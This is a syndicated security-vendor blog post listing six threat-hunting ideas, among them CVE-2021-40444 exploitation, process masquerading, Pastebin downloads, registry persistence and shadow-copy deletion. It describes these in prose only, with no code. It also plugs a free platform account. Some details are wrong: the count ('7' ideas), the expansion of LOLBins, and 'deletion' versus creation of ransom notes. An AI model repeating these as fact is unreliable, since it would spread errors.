6 Threat Hunting Ideas You Can Use Today!
Threat hunting is often referred to as a semi-scientific practice. Indeed, hunters will deploy hypothesis-based hunts, collect evidence, and document their findings – all of which should (hopefully) bring back fond memories of 9th grade science class. And just like in high school, the hardest part of the scientific process (and threat hunting) is often coming up with an idea to scientifically test. That’s why we’ve put together 6 threat hunting ideas you can start using today!
Before we start
Before I go through our 7 threat hunting ideas, I wanted to let you know that all of the threat hunting ideas you are going to see below are available for FREE as hunting packages on our threat hunting content platform. HUNTER threats! If you want the query, runbook, and more, go to https://hunter.cyborgsecurity.io click sign up and use promo code “HUNTIDES” for your free Community Edition account!
With that out of the way, let’s dive into some threat hunting ideas on what to look out for!
Threat hunting ideas #1: Look for exploitation of high-value vulnerabilities
One of the simplest threat hunting ideas is to simply look for behaviors that correspond to the active exploitation of high-level or high-value vulnerabilities. Indeed, adversaries often rely very heavily on specific vulnerabilities that they know how to exploit with skill. A good example of this is CVE-2021-40444:
Microsoft Word Control Panel Launch Process – Potential Exploit CVE-2021-40444
Microsoft Word suffered a ZeroDay attack in September 2021, identified as CVE-2021-40444. The vulnerability allowed Microsoft Word to execute code without requiring a macro to run. A malicious Word document containing a setup to load malicious code from a website allowed an attack to download and execute a payload without user interaction after opening the document. The exploit seen in the wild used the Control Panel executable (control.exe) to load DLL files disguised as INF files from one of several directories. This is abnormal behavior because these commands are usually related to the installation of file system filter drivers and are not common for Microsoft Word.
Threat Hunting Ideas #2: Look for the Masquerade
Another quick win for Hunt teams to focus on is seeking out the Masquerade. More often than not, adversaries and malware will try to blend in with background activity on their compromised system. This means that they can try to cloak their processes using legitimate sounding process names. A common example that has been widely used is Microsoft Defender.
Hiding Processes as a Microsoft Malware Protection Engine
The Microsoft Malware Protection Engine resides in the C:Program FilesWindows Defender or C:ProgramDataMicrosoftWindows Defender folders. All legitimate executions of the application should be spawned from these locations. This package identifies any outliers that are not running from these normal folders, indicating that a process is impersonating the legitimate Microsoft malware protection engine.
Threat hunting ideas #3: Look for suspicious uses of online services
Another high-fidelity threat hunting idea can be to look for suspicious activity related to the use of suspicious or banned online services. These services are often used to help an actor infiltrate an environment with their tools, but they can also be used as a data exfiltration method.
Using DropBox API – Attempting Upload/Download
Identify the use of the DropBox HTTP API via the URL string. Although the DropBox API can be very common, observing a PDF upload/download from a particular temporary directory could indicate activity related to Nobelium (UNC2452) reported in May 2021. Nobelium’s BoomBox downloader used the DropBox API over HTTP to send information to the machine and download another payload which is then saved to a folder in the user’s AppData directory and launched with rundll32.exe.
PowerShell Pastebin Download
This threat abuses Powershell commands to potentially download and execute code hosted on normally benign sources such as Pastebin, Github, and similarly-offered services. This particular method has been used by the REvil ransomware campaign and is a malware distribution method that can be obfuscated by trusting well-known sites.
Threat Hunting Ideas #4: Check for Suspicious Registry Usage
A good place to start a hunt is to check the log. Many adversaries and malware use the registry for persistence, especially the CurrentVersion registry key. If you’re looking for evidence of conflicting activity, the Windows Registry is a great place to start.
Attempt to VBScript stored in CurrentVersion registry key value not executed
Identify the potential new registry key name which is a non-autorun, non-run key in the HKLMSoftwareMicrosoftWindowsCurrentVersion registry key containing VBScript in the key value. The Windows Registry is a database of settings used by Microsoft Windows system applications and basic utilities. The registry is often abused by adversaries to store configuration information, hide code, evade detection, inhibit system operation, establish persistence, among other reasons. The “CurrentVersion” registry key in the HKCU (Current User) or HKLM (Local Machine) hives is one of the most used registry keys, specifically the Run key in CurrentVersion. Because of this, the Run key is closely monitored by detection and prevention tools. The technique targeted in this package only uses the CurrentVersion key to add malware configuration information and potentially establish persistence. This is probably due to the scrutiny of the Run key by defense tools.
Threat Hunting Ideas #5: Look for Suspicious Behavior
It may sound a bit like a tautology, but another great way to start the hunt is to look for suspicious behavior. Things like excessive file writes or file modifications can be a sign of ransomware activity on a system. You can also search for files with very unusual file extensions.
Excessive file writing or modification with common ransomware note extensions
Ransomware notes are commonly known to be dropped into common paths, such as a user’s desktop so they are more visible; using image files, .txt files and/or .doc files to serve as a communication platform. Attackers will also leave these ransomware notes in every folder or directory they choose to encrypt. This threat focuses on the excessive deletion of these notes, which potentially indicates Ransomware activity.
Several Ransomware variants drop a ransom note in every folder it encrypts, after all files in the folder are encrypted. The provided logic will search for common file extensions used by Ransomware for their notes and set a threshold of at least 20 unique folders where the same file is created or modified.
Threat hunting ideas #6: Look for suspicious behavior involving LOLBins
One of the biggest trends among adversaries these days is their increasing use of so-called “living outside the earth” binaries (or LOLBins). These allow actors to conduct activities while avoiding detection by various security platforms through the use of native Windows applications. An example of this is using built-in utilities to delete Volume Shadow Copies (or VSC) to prevent rollback.
Deleting Shadow Copies Using Operating System Utilities
Volume Shadow Copy Service is an infrastructure provided in Microsoft Windows operating systems to perform volume backups or to create consistent, point-in-time copies of data (known as Shadow Copies). Due to the functionality provided by Volume Shadow Copies, such as the ability to revert to a specific point-in-time copy of an NTFS volume, copies are often targeted by malware. Almost all Ransomware variants ensure destruction of Volume Shadow Copy (VSC) backups, so the infected user cannot easily restore their encrypted files. Similarly, Volume Shadow Copy (VSC) backups have also been observed to be targeted by Wiper malware variants (such as the “Olympic Destroyer” malware, which targeted the 2018 Winter Olympics in PyeongChang, Korea South), as well as Loader malware variants (such as the H1N1 Trojan Downloader).
Whether you’re just getting started hunting or you’re a seasoned, seasoned threat hunter, these threat hunting ideas will get you hunting. Don’t forget, if you want to access the great hunting content, you can apply for an exclusive FREE account on the HUNTER threat hunting content platform today!
*** This is a syndicated blog from the Security Bloggers Network of Cyborg Security written by Josh Campbell. Read the original post at: https://www.cyborgsecurity.com/blog/6-threat-hunting-ideas-you-can-use-today/